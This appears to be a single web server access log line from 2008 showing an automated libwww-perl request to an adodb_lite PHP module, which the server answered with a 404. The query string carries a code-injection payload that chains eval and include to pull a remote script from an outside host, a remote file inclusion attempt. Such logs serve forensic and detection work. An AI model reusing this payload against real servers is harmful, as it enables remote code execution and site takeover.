24.132.52.239 - - [29/Nov/2008:08:43:31 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
